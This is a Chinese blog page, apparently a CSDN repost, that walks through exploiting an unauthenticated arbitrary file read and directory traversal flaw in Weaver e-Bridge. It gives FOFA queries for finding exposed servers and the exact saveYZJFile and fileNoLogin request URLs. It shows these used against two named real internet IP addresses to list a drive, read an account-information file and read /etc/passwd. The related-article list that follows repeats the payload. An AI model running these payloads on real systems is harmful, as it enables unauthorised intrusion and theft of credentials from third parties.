python读取遍历data文件_泛微云桥目录遍历和文件读取

最新推荐文章于 2022-09-27 15:27:15 发布
最新推荐文章于 2022-09-27 15:27:15 发布
阅读量216 收藏 1
点赞数
文章标签: python读取遍历data文件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33514475/article/details/113581352
版权

Fofa: app="泛微-云桥e-Bridge"

试了一下,目标挺多的,fofa搜到的第一个就存在漏洞,然后大部分软件装在windows系统上,极小部分安装在linux系统上,搜linux目标要限定系统

app="泛微-云桥e-Bridge" && os="ubuntu"

目录遍历和文件读取取决于downloadUrl参数

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt

downloadUrl参数填写文件的绝对路径时,可以造成任意文件读取;

downloadUrl参数填写目录的绝对路径时,可以造成目录遍历。

然后访问/file/fileNoLogin/id,id就是第一个请求页面所得到的id值

Windows目标,以fofa上搜到的某互联网目标为例。

D盘目录遍历

http://223.99.199.138:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///D:/&fileExt=txt

a3e9443bc5b49adb51ec2deaecee737c.png

http://223.99.199.138:8088/file/fileNoLogin/e15782b0df7245c9847c252d7e8cd01e

f15a871aeae73814e0859816826926f3.png

这样就读取了d盘下的文件列表。接下来读取上图中d盘下文件【账号信息.txt】

http://223.99.199.138:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///D:/帐号信息.txt&fileExt=txt

1bfa2fc6a61ca9cc369c13115d0c8a44.png

http://223.99.199.138:8088/file/fileNoLogin/0912196b7d2d4c4f936f9f669293402d

0c0d39119eea10cc307508247ad17351.png

Linux也差不多,也是互联网目标,以/etc/passwd为例

http://202.104.111.228:8089/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/&fileExt=txt

9a2385263bed9471bdc6a242eccf1971.png

http://202.104.111.228:8089/file/fileNoLogin/2a79e8a4f09649f3a189bc7da6359195

e3bd5327a8e2675f07344ba7cd4c319f.png

http://202.104.111.228:8089/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt

ad1616553516244e54439f60635dfc57.png

http://202.104.111.228:8089/file/fileNoLogin/4a46e117fe6d4f63b7eb794c9416f16a

b2862f95497b2bf11008d06d9fb24516.png

不一定是要先目录遍历再文件读取,上面这样做只是为了记录演示而已。

inflectionAI
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
泛微 E Bridge 云桥任意文件读取
nnn2188185的博客
03-25 1128
泛微云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。
泛微云桥 e-Bridge 任意文件读取.md
04-11
泛微云桥 e-Bridge 任意文件读取
泛微云桥e-Bridge任意文件读取
MD@@nr丫卡uer
11-28 3645
泛微云桥e-Bridge任意文件读取漏洞 0x00漏洞影响版本: 该漏洞几乎影响2018-2019全版本。 0x01漏洞利用: 默认密码sysadmin/1 fofa搜索语句:title=“泛微云桥” 主要成因 /wxjsapi/saveYZJFil接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以下载相关敏感文件 构造如下语句 http://x.x.x.x/wxjsapi/saveYZJFile? fileName=test&downloadUrl=file:///etc/
泛微云桥e-Bridge-任意文件读取漏洞
chaojixiaojingang
10-09 6338
1.资产查找 Fofa: title="泛微云桥 e-Bridge" 2.漏洞描述 泛微云桥e-Bridge存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。 3.漏洞复现 1)Linux服务器 (1)在URL后添加payload payload:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt (2)在URL后添加/file/fileNo
python读取data_Python DataFile包_程序模块 - PyPI - Python文网
weixin_39590739的博客
11-24 357
此包提供了打开数据文件的简单方法通过返回对应于如果列包含字符串,则返回字符串数组。默认情况下,它将尝试从注释猜测索引,如果失败,则将索引它。从0到n:#!/usr/bin/env pythonfrom datafile.extractfile import dataFilef = dataFile("./datafile/test/testdocfile.txt")# the index wil...
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
泛微e9前端接口api_泛微E8相关文档
09-21
泛微e9前端接口api泛微e9前端接口api
泛微e-office短信插件_泛微短信接口开发_e-office短信发送设置
02-11
泛微e-office短信插件_泛微短信接口开发_e-office短信发送设置
Excel复制进入详细表_oa系统_Excel复制进入详细表_泛微OA_
10-02
泛微oa系统,在流程部署时候可选择使用,Excel复制进入详细表。
python读取data_python 下串口数据读取,解析,和保存-
weixin_39729262的博客
11-24 291
# !\/usr\/bin\/python # - *编码:utf - 8 - * -importserialimportthreadingimportbinasciifrom datetime importdatetimeimportstructimportcsvclassSerialPort: def __init__(自我、端口、buand):(港口,buand) () (): () def...
泛微e-Bridge未授权文件读取漏洞复现
The current road is different, love needs to distinguish between right and wrong
03-05 7421
简介 泛微云桥 e-Bridge 存在未经授权读取任意文件漏洞,可利用该漏洞,实现任意文件读取,获取敏感信息。 fofa title="泛微云桥e-Bridge" 漏洞复现 因为不是在本地搭建的漏洞复现环境,利用空间搜索引擎只找到很少量存在漏洞的网站,大多数都开启了身份验证,找到的也都是基于Windows的,所以就不在介绍Linux上搭建的了。 payload1 /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///
python读取data_python – App引擎读取模块之间的DataStore数...
weixin_39912303的博客
11-24 88
我有一个应用程序分为5个模块(见我美丽的ascii艺术)每个都有自己的目录,就像this结构AppEngine App
基于Python的Webservice开发(四)-泛微OA的SOAP接口
weixin_30670965的博客
01-27 1455
一、功能需求 泛微e-cology可以在流程调用Webservice接口实现与其他系统的联动等复杂功能。但是目前泛微文档仅提供了调用的方法,但是没有关于接口的相关开发信息。 本次案例是用Python开发一个泛微e-cology 可以调用的Webservice接口。 二、所需要的库 pip install spyne 对于Python3 pip install spyne=...
读取数据集图片
weixin_42194505的博客
09-27 351
读取数据
e-brige任意文件读取
Jiajiajiang_的博客
11-30 402
漏洞复现 首先访问/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt 获取到一个id值 然后访问file/fileNoLogin/[id] 获取到C盘下的目录 linux同理,可以读到更多配置文件 然后我们发现/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/Users/Administrator/Deskto
如何用python批量读取图片
weixin_43854551的博客
11-19 4124
0到9十个数字,每个数字有500张图片,datanumber文件下面有10个文件夹,分别对应0到9这10个数字的文件夹,每个子文件夹下面有对应数字的500张图片 import numpy as np from sklearn.neighbors import KNeighborsClassifier # 读取图片 import matplotlib.image as mpimg # 显示图片 im...
简单循环读取文件的图片用于opencv处理
qq_32278309的博客
05-05 757
std::stringstream StrStm; //用以 重载了<>i 的函数 //string StrStm; string imageFileName; string filePath = “leo”; StrStm << i ; StrStm >> imageFileName; filePath += imageFileName; filePath +...
基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip
05-31
【优质项目推荐】 1、项目代码均经过严格本地测试,运行OK,确保功能稳定后才上传平台。可放心下载并立即投入使用,若遇到任何使用问题,随时欢迎私信反馈与沟通,博主会第一时间回复。 2、项目适用于计算机相关专业(如计科、信息安全、数据科学、人工智能、通信、物联网、自动化、电子信息等)的在校学生、专业教师,或企业员工,小白入门等都适用。 3、该项目不仅具有很高的学习借鉴价值,对于初学者来说,也是入门进阶的绝佳选择;当然也可以直接用于 毕设、课设、期末大作业或项目初期立项演示等。 3、开放创新:如果您有一定基础,且热爱探索钻研,可以在此代码基础上二次开发,进行修改、扩展,创造出属于自己的独特应用。 欢迎下载使用优质资源!欢迎借鉴使用,并欢迎学习交流,共同探索编程的无穷魅力! 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip
六一儿童节快乐!(六一儿童节庆祝代码)Vue开发
最新发布
05-31
六一儿童节快乐!(六一儿童节庆祝代码)Vue开发 like Project setup npm install Compiles and hot-reloads for development npm run serve Compiles and minifies for production npm run build Lints and fixes files npm run lint Customize configuration
泛微 e-cology9 filedownload.jsp 任意文件读取
11-24
泛微 e-cology9 是一款企业级办公自动化软件,然而它的 filedownload.jsp 存在任意文件读取漏洞。攻击者可以通过构造恶意的请求,访问该漏洞并读取系统的任意文件,包括敏感信息如用户凭证、配置文件数据库等数据。这种漏洞可能对企业的数据安全造成严重威胁,因此需要尽快得到修复。 修复这个漏洞的方法之一是及时升级软件版本,确保安装了最新的补丁程序。此外,也可以通过屏蔽 filedownload.jsp 文件或者限制其访问权限的方法来暂时防范该漏洞。另外,加强网络安全防护,限制外部访问和加密重要数据,也是保护系统安全的有效手段。同时,企业也应该加强对于软件漏洞的监测和应急处理能力,及时发现和处理类似问题,减少潜在的安全隐患。 总的来说,泛微 e-cology9 的 filedownload.jsp 任意文件读取漏洞可能对企业的数据和信息安全造成严重威胁,需要引起重视并及时采取措施加以修复和预防。企业需要全面加强系统的安全防护能力,加强漏洞管理和修复工作,以确保企业信息系统的安全稳定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值